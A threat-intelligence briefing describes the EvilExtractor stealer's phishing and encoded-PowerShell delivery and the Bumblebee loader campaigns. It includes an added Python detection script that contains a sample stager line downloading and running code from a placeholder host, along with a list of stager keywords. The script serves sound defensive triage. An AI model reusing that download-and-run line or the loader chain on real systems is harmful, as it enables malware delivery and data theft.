New All-in-One "EvilExtractor" Stealer

A new "All-in-One" stealer malware named EvilExtractor (also spelled Evil Extractor) is being marketed to other threat actors to steal data and files from Windows systems.  It includes several modules that all work via an FTP service.  The new stealer also contains environment checking and Anti-VM functions. Its primary purpose seems to be to steal browser data and information from compromised endpoints and then upload it to the attacker's FTP server.

The researchers said they observed a surge in attacks spreading the malware in March 2023, with most victims in Europe and the US.  While marketed as an educational tool, EvilExtractor has been adopted by threat actors for use as an information stealer.  The attack tool has been sold by a cyber threat actor named Kodex on cybercrime forums like Cracked since 22 October 2022.  It is continually updated and includes various modules to siphon system metadata, passwords, and cookies from various web browsers, record keystrokes, and even act as ransomware by encrypting files on the target system.[1]

The malware is also said to have been part of a phishing email campaign detected on 30 March 2023.  The emails lure recipients into launching an executable that masquerades as a PDF document under the pretext of confirming their "account details."  The "Account_Info.exe" binary is an obfuscated Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch EvilExtractor.  Besides gathering files, the malware can also activate the webcam and capture screenshots.
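The chain described above (a document-looking executable launching PowerShell with a Base64-encoded script) can be triaged from process-creation telemetry. The following is an added example, not code from the original report or from the researchers; the event format, the sample events, the user-writable path list and the stand-in encoded script are all constructed for illustration.

```python
import base64
import re

# The -EncodedCommand switch family (-e, -ec, -enc, -EncodedCommand), case-insensitive.
ENC_SWITCH = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/]{16,}={0,2})", re.IGNORECASE)
# Cmdlets and APIs commonly seen in loader stubs; matched case-insensitively in the decoded script.
STAGER_HINTS = ("invoke-expression", "iex", "downloadstring", "frombase64string", "reflection.assembly")
# Constructed list of user-writable locations from which a freshly delivered "document" tends to run.
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\")

def encode_command(script: str) -> str:
    """Encode as powershell.exe -EncodedCommand expects: UTF-16LE bytes, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_command(blob: str):
    """Reverse of encode_command; returns None if the blob is not valid UTF-16LE Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(parent_image: str, command_line: str) -> dict:
    """Score one process-creation event; returns matched reasons and the decoded script, if any."""
    reasons = []
    m = ENC_SWITCH.search(command_line)
    decoded = decode_command(m.group(1)) if m else None
    if m:
        reasons.append("encoded powershell")
    if decoded and any(h in decoded.lower() for h in STAGER_HINTS):
        reasons.append("stager cmdlet in decoded script")
    if any(p in parent_image.lower() for p in USER_WRITABLE):
        reasons.append("parent runs from user-writable path")
    return {"parent": parent_image, "reasons": reasons, "decoded": decoded}

# Constructed sample events as (parent image, child command line). The encoded script is a
# harmless stand-in built with encode_command, not the real loader script from the campaign.
FAKE_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_EVENTS = [
    ("C:\\Users\\alice\\Downloads\\Account_Info.exe",
     "powershell.exe -nop -w hidden -enc " + encode_command(FAKE_STAGER)),
    ("C:\\Windows\\System32\\cmd.exe",
     "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
]

def suspicious_events(events):
    """Return triage results for events that hit at least two indicators."""
    return [t for t in (triage(p, c) for p, c in events) if len(t["reasons"]) >= 2]

if __name__ == "__main__":
    for hit in suspicious_events(SAMPLE_EVENTS):
        print(hit["parent"], "->", ", ".join(hit["reasons"]))
        print("   decoded:", hit["decoded"])
```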

EvilExtractor is a comprehensive info stealer with multiple malicious features, including ransomware.  Its PowerShell script can elude detection in a .NET loader or PyArmor.  Within a very short time, its developer has updated several functions and increased its stability.  The findings coincide with a separately documented malvertising and SEO poisoning campaign that delivered the Bumblebee malware loader via trojanized legitimate software installers.

Bumblebee, first documented about one year ago, is a modular loader that propagates primarily through phishing techniques.  At the time it was a new malware loader linked to several threat actors and high-profile ransomware operations. Specializing in stealth, Bumblebee was responsible for multiple cyberattacks. It was still in active development, but the malware was determined to be an upgraded replacement for BazarLoader.

Additionally, the malware was observed to have elaborate evasion techniques, including complex anti-virtualization.  Researchers found that the threat actors behind Bumblebee are associated with Quantum, Conti, and MountLocker. Bumblebee has been hardened to become a highly sophisticated malware distributed via phishing email campaigns.

The use of SEO poisoning and malicious ads to redirect users searching for popular tools like ChatGPT, Cisco AnyConnect, Citrix Workspace, and Zoom to rogue websites hosting tainted installers has witnessed a spike in recent months after Microsoft began blocking macros by default from Office files downloaded from the internet.

In one incident described by investigators, the threat actor used the Bumblebee malware to obtain an entry point and move laterally after three hours to deploy Cobalt Strike and legitimate remote access software like AnyDesk and Dameware.  The attack was ultimately disrupted before it proceeded to the final ransomware stage.  Organizations should ensure that software installers and updates are only downloaded from known and trusted websites to mitigate this and similar threats.


Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com 

Weekly Cyber Intelligence Briefings:

Reporting: https://www.redskyalliance.org/
Website: https://www.redskyalliance.com/
LinkedIn: https://www.linkedin.com/company/64265941    

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5504229295967742989    

[1] https://thehackernews.com/2023/04/new-all-in-one-evilextractor-stealer.html
